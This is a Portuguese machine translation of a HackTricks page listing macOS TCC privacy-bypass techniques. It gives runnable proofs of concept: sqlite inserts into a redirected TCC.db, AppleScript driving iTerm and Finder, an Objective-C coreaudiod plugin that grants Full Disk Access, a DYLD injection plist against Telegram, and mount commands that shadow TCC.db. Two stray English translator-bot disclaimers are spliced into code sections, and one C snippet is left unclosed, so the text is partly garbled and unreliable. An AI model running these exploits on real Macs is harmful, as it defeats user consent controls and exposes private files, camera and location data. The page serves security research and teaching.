hacktricks/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses
2023-12-26 02:05:14 +00:00
..
macos-apple-scripts.md Translated ['macos-hardening/macos-auto-start-locations.md', 'macos-hard 2023-10-01 18:12:00 +00:00
README.md Translated ['forensics/basic-forensic-methodology/specific-software-file 2023-12-26 02:05:14 +00:00

Bypasses do TCC no macOS

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

Por funcionalidade

Bypass de Escrita

Isso não é um bypass, é apenas como o TCC funciona: Ele não protege contra escrita. Se o Terminal não tem acesso para ler a Área de Trabalho de um usuário, ele ainda pode escrever nela:

username@hostname ~ % ls Desktop
ls: Desktop: Operation not permitted
username@hostname ~ % echo asd > Desktop/lalala
username@hostname ~ % ls Desktop
ls: Desktop: Operation not permitted
username@hostname ~ % cat Desktop/lalala
asd

O atributo estendido com.apple.macl é adicionado ao novo arquivo para dar ao aplicativo criador acesso para lê-lo.

Bypass SSH

Por padrão, um acesso via SSH costumava ter "Acesso Total ao Disco". Para desativar isso, você precisa listá-lo, mas desabilitado (removê-lo da lista não removerá esses privilégios):

Aqui você pode encontrar exemplos de como alguns malwares conseguiram burlar essa proteção:

{% hint style="danger" %} Observe que agora, para poder habilitar o SSH, você precisa de Acesso Total ao Disco {% endhint %}

Manipulação de extensões - CVE-2022-26767

O atributo com.apple.macl é dado a arquivos para conceder a uma certa aplicação permissões para lê-lo. Este atributo é definido quando se faz drag&drop de um arquivo sobre um aplicativo, ou quando um usuário clica duas vezes em um arquivo para abri-lo com o aplicativo padrão.

Portanto, um usuário poderia registrar um aplicativo malicioso para manipular todas as extensões e chamar os Serviços de Lançamento para abrir qualquer arquivo (assim o arquivo malicioso terá permissão para lê-lo).

iCloud

O direito com.apple.private.icloud-account-access possibilita a comunicação com o serviço XPC com.apple.iCloudHelper, que fornecerá tokens do iCloud.

iMovie e Garageband tinham esse direito e outros que permitiam.

Para mais informações sobre o exploit para obter tokens do iCloud desse direito, confira a palestra: #OBTS v5.0: "What Happens on your Mac, Stays on Apple's iCloud?!" - Wojciech Regula

kTCCServiceAppleEvents / Automação

Um aplicativo com a permissão kTCCServiceAppleEvents poderá controlar outros aplicativos. Isso significa que ele poderia abusar das permissões concedidas a outros aplicativos.

Para mais informações sobre Apple Scripts, confira:

{% content-ref url="macos-apple-scripts.md" %} macos-apple-scripts.md {% endcontent-ref %}

Por exemplo, se um aplicativo tem permissão de Automação sobre o iTerm, por exemplo, neste exemplo o Terminal tem acesso sobre o iTerm:

Sobre o iTerm

O Terminal, que não tem FDA, pode chamar o iTerm, que tem, e usá-lo para realizar ações:

{% code title="iterm.script" %}

tell application "iTerm"
activate
tell current window
create tab with default profile
end tell
tell current session of current window
write text "cp ~/Desktop/private.txt /tmp"
end tell
end tell

Since the provided text does not contain any English content to translate, there is nothing to translate into Portuguese. If you provide the relevant English text, I can then proceed with the translation while maintaining the markdown and HTML syntax as requested.

osascript iterm.script

Sobre o Finder

Ou se um aplicativo tiver acesso ao Finder, ele poderia usar um script como este:

set a_user to do shell script "logname"
tell application "Finder"
set desc to path to home folder
set copyFile to duplicate (item "private.txt" of folder "Desktop" of folder a_user of item "Users" of disk of home) to folder desc with replacing
set t to paragraphs of (do shell script "cat " & POSIX path of (copyFile as alias)) as text
end tell
do shell script "rm " & POSIX path of (copyFile as alias)

Por Comportamento de Aplicativo

CVE-20209934 - TCC

O daemon tccd do espaço do usuário estava utilizando a variável de ambiente HOME para acessar o banco de dados de usuários do TCC em: $HOME/Library/Application Support/com.apple.TCC/TCC.db

De acordo com este post no Stack Exchange e porque o daemon TCC está sendo executado via launchd dentro do domínio do usuário atual, é possível controlar todas as variáveis de ambiente passadas para ele.
Assim, um atacante poderia definir a variável de ambiente $HOME no launchctl para apontar para um diretório controlado, reiniciar o daemon TCC, e então modificar diretamente o banco de dados do TCC para conceder a si mesmo todos os direitos do TCC disponíveis sem nunca solicitar ao usuário final.
Prova de Conceito (PoC):

# reset database just in case (no cheating!)
$> tccutil reset All
# mimic TCC's directory structure from ~/Library
$> mkdir -p "/tmp/tccbypass/Library/Application Support/com.apple.TCC"
# cd into the new directory
$> cd "/tmp/tccbypass/Library/Application Support/com.apple.TCC/"
# set launchd $HOME to this temporary directory
$> launchctl setenv HOME /tmp/tccbypass
# restart the TCC daemon
$> launchctl stop com.apple.tccd && launchctl start com.apple.tccd
# print out contents of TCC database and then give Terminal access to Documents
$> sqlite3 TCC.db .dump
$> sqlite3 TCC.db "INSERT INTO access
VALUES('kTCCServiceSystemPolicyDocumentsFolder',
'com.apple.Terminal', 0, 1, 1,
X'fade0c000000003000000001000000060000000200000012636f6d2e6170706c652e5465726d696e616c000000000003',
NULL,
NULL,
'UNUSED',
NULL,
NULL,
1333333333333337);"
# list Documents directory without prompting the end user
$> ls ~/Documents

CVE-2021-30761 - Notas

Notas tinha acesso a locais protegidos pelo TCC, mas quando uma nota é criada, ela é criada em um local não protegido. Assim, você poderia pedir ao aplicativo Notas para copiar um arquivo protegido em uma nota (portanto, em um local não protegido) e depois acessar o arquivo:

CVE-2021-30782 - Translocação

O binário /usr/libexec/lsd com a biblioteca libsecurity_translocate tinha a autorização com.apple.private.nullfs_allow que permitia criar uma montagem nullfs e tinha a autorização com.apple.private.tcc.allow com kTCCServiceSystemPolicyAllFiles para acessar todos os arquivos.

Era possível adicionar o atributo de quarentena à "Biblioteca", chamar o serviço XPC com.apple.security.translocation e então ele mapearia a Biblioteca para $TMPDIR/AppTranslocation/d/d/Library onde todos os documentos dentro da Biblioteca poderiam ser acessados.

CVE-2023-38571 - Música & TV

Music tem um recurso interessante: Quando está em execução, ele vai importar os arquivos soltos em ~/Music/Music/Media.localized/Automatically Add to Music.localized para a "biblioteca de mídia" do usuário. Além disso, ele chama algo como: rename(a, b); onde a e b são:

  • a = "~/Music/Music/Media.localized/Automatically Add to Music.localized/myfile.mp3"
  • b = "~/Music/Music/Media.localized/Automatically Add to Music.localized/Not Added.localized/2023-09-25 11.06.28/myfile.mp3"

Este comportamento rename(a, b); é vulnerável a uma Condição de Corrida, pois é possível colocar dentro da pasta Automatically Add to Music.localized um arquivo falso TCC.db e então quando a nova pasta(b) for criada para copiar o arquivo, deletá-lo e apontá-lo para ~/Library/Application Support/com.apple.TCC/.

SQLITE_SQLLOG_DIR - CVE-2023-32422

Se SQLITE_SQLLOG_DIR="path/folder" basicamente significa que qualquer db aberto é copiado para esse caminho. Neste CVE, esse controle foi abusado para escrever dentro de um banco de dados SQLite que vai ser aberto por um processo com FDA o banco de dados TCC, e então abusar de SQLITE_SQLLOG_DIR com um symlink no nome do arquivo para que quando esse banco de dados for aberto, o TCC.db do usuário seja sobrescrito com o aberto.
Mais informações no writeup e na palestra.

SQLITE_AUTO_TRACE

Se a variável de ambiente SQLITE_AUTO_TRACE estiver definida, a biblioteca libsqlite3.dylib começará a registrar todas as consultas SQL. Muitas aplicações usavam essa biblioteca, então era possível registrar todas as suas consultas SQLite.

Várias aplicações da Apple usavam essa biblioteca para acessar informações protegidas pelo TCC.

# Set this env variable everywhere
launchctl setenv SQLITE_AUTO_TRACE 1

MTL_DUMP_PIPELINES_TO_JSON_FILE - CVE-2023-32407

Esta variável de ambiente é usada pelo framework Metal que é uma dependência para vários programas, principalmente Music, que possui FDA.

Definindo o seguinte: MTL_DUMP_PIPELINES_TO_JSON_FILE="caminho/nome". Se caminho for um diretório válido, o bug será acionado e podemos usar fs_usage para ver o que está acontecendo no programa:

  • um arquivo será open()ed, chamado caminho/.dat.nosyncXXXX.XXXXXX (X é aleatório)
  • um ou mais write()s escreverão o conteúdo no arquivo (não controlamos isso)
  • caminho/.dat.nosyncXXXX.XXXXXX será renamed()d para caminho/nome

É uma escrita de arquivo temporário, seguida por um rename(old, new) que não é seguro.

Não é seguro porque precisa resolver os caminhos antigo e novo separadamente, o que pode levar algum tempo e pode ser vulnerável a uma Condição de Corrida. Para mais informações, você pode verificar a função xnu renameat_internal().

{% hint style="danger" %} Então, basicamente, se um processo privilegiado estiver renomeando de uma pasta que você controla, você poderia ganhar um RCE e fazê-lo acessar um arquivo diferente ou, como neste CVE, abrir o arquivo que o aplicativo privilegiado criou e armazenar um FD.

Se o rename acessar uma pasta que você controla, enquanto você modificou o arquivo de origem ou tem um FD para ele, você muda o arquivo de destino (ou pasta) para apontar um symlink, para que você possa escrever quando quiser. {% endhint %}

Este foi o ataque no CVE: Por exemplo, para sobrescrever o TCC.db do usuário, podemos:

  • criar /Users/hacker/ourlink para apontar para /Users/hacker/Library/Application Support/com.apple.TCC/
  • criar o diretório /Users/hacker/tmp/
  • definir MTL_DUMP_PIPELINES_TO_JSON_FILE=/Users/hacker/tmp/TCC.db
  • acionar o bug executando Music com esta variável de ambiente
  • capturar o open() de /Users/hacker/tmp/.dat.nosyncXXXX.XXXXXX (X é aleatório)
  • aqui também open() este arquivo para escrita e segurar o descritor de arquivo
  • alternar atomicamente /Users/hacker/tmp com /Users/hacker/ourlink em um loop
  • fazemos isso para maximizar nossas chances de sucesso, pois a janela de corrida é bem estreita, mas perder a corrida tem poucas desvantagens
  • esperar um pouco
  • testar se tivemos sorte
  • se não, começar novamente do topo

Mais informações em https://gergelykalman.com/lateralus-CVE-2023-32407-a-macos-tcc-bypass.html

{% hint style="danger" %} Agora, se você tentar usar a variável de ambiente MTL_DUMP_PIPELINES_TO_JSON_FILE, os aplicativos não serão iniciados {% endhint %}

Apple Remote Desktop

Como root, você poderia habilitar este serviço e o agente ARD terá acesso total ao disco que poderia então ser abusado por um usuário para fazer com que ele copie um novo banco de dados de usuário TCC.

Por NFSHomeDirectory

O TCC usa um banco de dados na pasta HOME do usuário para controlar o acesso a recursos específicos do usuário em $HOME/Library/Application Support/com.apple.TCC/TCC.db.
Portanto, se o usuário conseguir reiniciar o TCC com uma variável de ambiente $HOME apontando para uma pasta diferente, o usuário poderia criar um novo banco de dados TCC em /Library/Application Support/com.apple.TCC/TCC.db e enganar o TCC para conceder qualquer permissão TCC a qualquer aplicativo.

{% hint style="success" %} Note que a Apple usa a configuração armazenada no perfil do usuário no atributo NFSHomeDirectory para o valor de $HOME, então se você comprometer um aplicativo com permissões para modificar este valor (kTCCServiceSystemPolicySysAdminFiles), você pode armar esta opção com um bypass de TCC. {% endhint %}

CVE-20209934 - TCC

CVE-2020-27937 - Directory Utility

CVE-2021-30970 - Powerdir

O primeiro POC usa dsexport e dsimport para modificar a pasta HOME do usuário.

  1. Obter um blob csreq para o aplicativo alvo.
  2. Plantar um arquivo TCC.db falso com o acesso necessário e o blob csreq.
  3. Exportar a entrada do Serviço de Diretórios do usuário com dsexport.
  4. Modificar a entrada do Serviço de Diretórios para mudar a pasta home do usuário.
  5. Importar a entrada do Serviço de Diretórios modificada com dsimport.
  6. Parar o tccd do usuário e reiniciar o processo.

O segundo POC usou /usr/libexec/configd que tinha com.apple.private.tcc.allow com o valor kTCCServiceSystemPolicySysAdminFiles.
Era possível executar configd com a opção -t, um atacante poderia especificar um Bundle personalizado para carregar. Portanto, o exploit substitui o método dsexport e dsimport de mudar a pasta home do usuário com uma injeção de código configd.

Para mais informações, confira o relatório original.

Por injeção de processo

Existem diferentes técnicas para injetar código dentro de um processo e abusar de seus privilégios TCC:

{% content-ref url="../../../macos-proces-abuse/" %} macos-proces-abuse {% endcontent-ref %}

Além disso, a injeção de processo mais comum encontrada para bypass de TCC é via plugins (carregar biblioteca).
Plugins são códigos extras geralmente na forma de bibliotecas ou plist, que serão carregados pela aplicação principal e executarão sob seu contexto. Portanto, se a aplicação principal tinha acesso a arquivos restritos pelo TCC (via permissões concedidas ou entitlements), o código personalizado também terá.

CVE-2020-27937 - Directory Utility

O aplicativo /System/Library/CoreServices/Applications/Directory Utility.app tinha o entitlement kTCCServiceSystemPolicySysAdminFiles, carregava plugins com extensão .daplug e não tinha o runtime endurecido.

Para armar este CVE, o NFSHomeDirectory é alterado (abusando do entitlement anterior) para poder assumir o controle do banco de dados TCC dos usuários para bypass do TCC.

Para mais informações, confira o relatório original.

CVE-2020-29621 - Coreaudiod

O binário /usr/sbin/coreaudiod tinha os entitlements com.apple.security.cs.disable-library-validation e com.apple.private.tcc.manager. O primeiro permitindo injeção de código e o segundo dando acesso para gerenciar TCC.

Este binário permitia carregar plug-ins de terceiros da pasta /Library/Audio/Plug-Ins/HAL. Portanto, era possível carregar um plugin e abusar das permissões TCC com este PoC:

#import <Foundation/Foundation.h>
#import <Security/Security.h>

extern void TCCAccessSetForBundleIdAndCodeRequirement(CFStringRef TCCAccessCheckType, CFStringRef bundleID, CFDataRef requirement, CFBooleanRef giveAccess);

void add_tcc_entry() {
CFStringRef TCCAccessCheckType = CFSTR("kTCCServiceSystemPolicyAllFiles");

CFStringRef bundleID = CFSTR("com.apple.Terminal");
CFStringRef pureReq = CFSTR("identifier \"com.apple.Terminal\" and anchor apple");
SecRequirementRef requirement = NULL;
SecRequirementCreateWithString(pureReq, kSecCSDefaultFlags, &requirement);
CFDataRef requirementData = NULL;
SecRequirementCopyData(requirement, kSecCSDefaultFlags, &requirementData);

TCCAccessSetForBundleIdAndCodeRequirement(TCCAccessCheckType, bundleID, requirementData, kCFBooleanTrue);
}

__attribute__((constructor)) static void constructor(int argc, const char **argv) {

add_tcc_entry();

NSLog(@"[+] Exploitation finished...");
exit(0);

Para mais informações, confira o relatório original.

Plug-Ins da Camada de Abstração de Dispositivo (DAL)

Aplicações do sistema que abrem transmissão de câmera via Core Media I/O (aplicativos com kTCCServiceCamera) carregam no processo esses plugins localizados em /Library/CoreMediaIO/Plug-Ins/DAL (não restrito pelo SIP).

Apenas armazenar ali uma biblioteca com o construtor comum funcionará para injetar código.

Várias aplicações da Apple eram vulneráveis a isso.

Firefox

O aplicativo Firefox possuía os direitos com.apple.security.cs.disable-library-validation e com.apple.security.cs.allow-dyld-environment-variables:

codesign -d --entitlements :- /Applications/Firefox.app
Executable=/Applications/Firefox.app/Contents/MacOS/firefox

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "https://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>com.apple.security.cs.allow-unsigned-executable-memory</key>
<true/>
<key>com.apple.security.cs.disable-library-validation</key>
<true/>
<key>com.apple.security.cs.allow-dyld-environment-variables</key><true/>
<true/>
<key>com.apple.security.device.audio-input</key>
<true/>
<key>com.apple.security.device.camera</key>
<true/>
<key>com.apple.security.personal-information.location</key>
<true/>
<key>com.apple.security.smartcard</key>
<true/>
</dict>
</plist>

Para mais informações sobre como explorar isso facilmente, verifique o relatório original.

CVE-2020-10006

O binário /system/Library/Filesystems/acfs.fs/Contents/bin/xsanctl possuía os entitlements com.apple.private.tcc.allow e com.apple.security.get-task-allow, o que permitia injetar código no processo e usar os privilégios do TCC.

CVE-2023-26818 - Telegram

O Telegram tinha os entitlements com.apple.security.cs.allow-dyld-environment-variables e com.apple.security.cs.disable-library-validation, então era possível abusar disso para obter acesso às suas permissões, como gravar com a câmera. Você pode encontrar o payload no writeup.

Observe como usar a variável de ambiente para carregar uma biblioteca, um plist personalizado foi criado para injetar esta biblioteca e launchctl foi usado para iniciá-la:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>Label</key>
<string>com.telegram.launcher</string>
<key>RunAtLoad</key>
<true/>
<key>EnvironmentVariables</key>
<dict>
<key>DYLD_INSERT_LIBRARIES</key>
<string>/tmp/telegram.dylib</string>
</dict>
<key>ProgramArguments</key>
<array>
<string>/Applications/Telegram.app/Contents/MacOS/Telegram</string>
</array>
<key>StandardOutPath</key>
<string>/tmp/telegram.log</string>
<key>StandardErrorPath</key>
<string>/tmp/telegram.log</string>
</dict>
</plist>
launchctl load com.telegram.launcher.plist

Por invocações do comando open

É possível invocar open mesmo estando em sandbox

Scripts do Terminal

É bastante comum conceder ao terminal Acesso Total ao Disco (FDA), pelo menos em computadores utilizados por pessoas da área técnica. E é possível invocar scripts .terminal usando isso.

Scripts .terminal são arquivos plist como este, com o comando a ser executado na chave CommandString:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> <plist version="1.0">
<dict>
<key>CommandString</key>
<string>cp ~/Desktop/private.txt /tmp/;</string>
<key>ProfileCurrentVersion</key>
<real>2.0600000000000001</real>
<key>RunCommandAsShell</key>
<false/>
<key>name</key>
<string>exploit</string>
<key>type</key>
<string>Window Settings</string>
</dict>
</plist>

Uma aplicação poderia escrever um script de terminal em um local como /tmp e iniciá-lo com um comando como:

// Write plist in /tmp/tcc.terminal
[...]
NSTask *task = [[NSTask alloc] init];
NSString * exploit_location = @"/tmp/tcc.terminal";
task.launchPath = @"/usr/bin/open";
task.arguments = @[@"-a", @"/System/Applications/Utilities/Terminal.app",
exploit_location]; task.standardOutput = pipe;
[task launch];

Por montagem

CVE-2020-9771 - bypass do TCC e escalonamento de privilégio com mount_apfs

Qualquer usuário (mesmo os não privilegiados) pode criar e montar um snapshot do time machine e acessar TODOS os arquivos desse snapshot.
O único privilégio necessário é que o aplicativo usado (como o Terminal) tenha acesso a Acesso Completo ao Disco (FDA) (kTCCServiceSystemPolicyAllfiles), o qual deve ser concedido por um administrador.

{% code overflow="wrap" %}

# Create snapshot
tmutil localsnapshot

# List snapshots
tmutil listlocalsnapshots /
Snapshots for disk /:
com.apple.TimeMachine.2023-05-29-001751.local

# Generate folder to mount it
cd /tmp # I didn it from this folder
mkdir /tmp/snap

# Mount it, "noowners" will mount the folder so the current user can access everything
/sbin/mount_apfs -o noowners -s com.apple.TimeMachine.2023-05-29-001751.local /System/Volumes/Data /tmp/snap

# Access it
ls /tmp/snap/Users/admin_user # This will work

{% endcode %}

Uma explicação mais detalhada pode ser encontrada no relatório original.

CVE-2021-1784 & CVE-2021-30808 - Montar sobre o arquivo TCC

Mesmo que o arquivo do banco de dados TCC esteja protegido, era possível montar sobre o diretório um novo arquivo TCC.db:

{% code overflow="wrap" %}

# CVE-2021-1784
## Mount over Library/Application\ Support/com.apple.TCC
hdiutil attach -owners off -mountpoint Library/Application\ Support/com.apple.TCC test.dmg

# CVE-2021-1784
## Mount over ~/Library
hdiutil attach -readonly -owners off -mountpoint ~/Library /tmp/tmp.dmg

Since the provided text does not contain any English content to translate, there is no translation to provide. If you have specific English text that you would like translated into Portuguese, please provide the text, and I will be happy to assist.

# This was the python function to create the dmg
def create_dmg():
os.system("hdiutil create /tmp/tmp.dmg -size 2m -ov -volname \"tccbypass\" -fs APFS 1>/dev/null")
os.system("mkdir /tmp/mnt")
os.system("hdiutil attach -owners off -mountpoint /tmp/mnt /tmp/tmp.dmg 1>/dev/null")
os.system("mkdir -p /tmp/mnt/Application\ Support/com.apple.TCC/")
os.system("cp /tmp/TCC.db /tmp/mnt/Application\ Support/com.apple.TCC/TCC.db")
os.system("hdiutil detach /tmp/mnt 1>/dev/null")

Verifique o exploit completo no artigo original.

asr

A ferramenta /usr/sbin/asr permitia copiar todo o disco e montá-lo em outro local, contornando as proteções do TCC.

Serviços de Localização

Existe um terceiro banco de dados do TCC em /var/db/locationd/clients.plist para indicar clientes autorizados a acessar serviços de localização.
A pasta /var/db/locationd/ não estava protegida contra montagem de DMG então era possível montar nosso próprio plist.

Por aplicativos de inicialização

{% content-ref url="../../../../macos-auto-start-locations.md" %} macos-auto-start-locations.md {% endcontent-ref %}

Por grep

Em várias ocasiões, arquivos armazenarão informações sensíveis como e-mails, números de telefone, mensagens... em locais não protegidos (o que conta como uma vulnerabilidade na Apple).

Cliques Sintéticos

Isso não funciona mais, mas funcionou no passado:

Outra maneira usando eventos CoreGraphics:

Referência

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥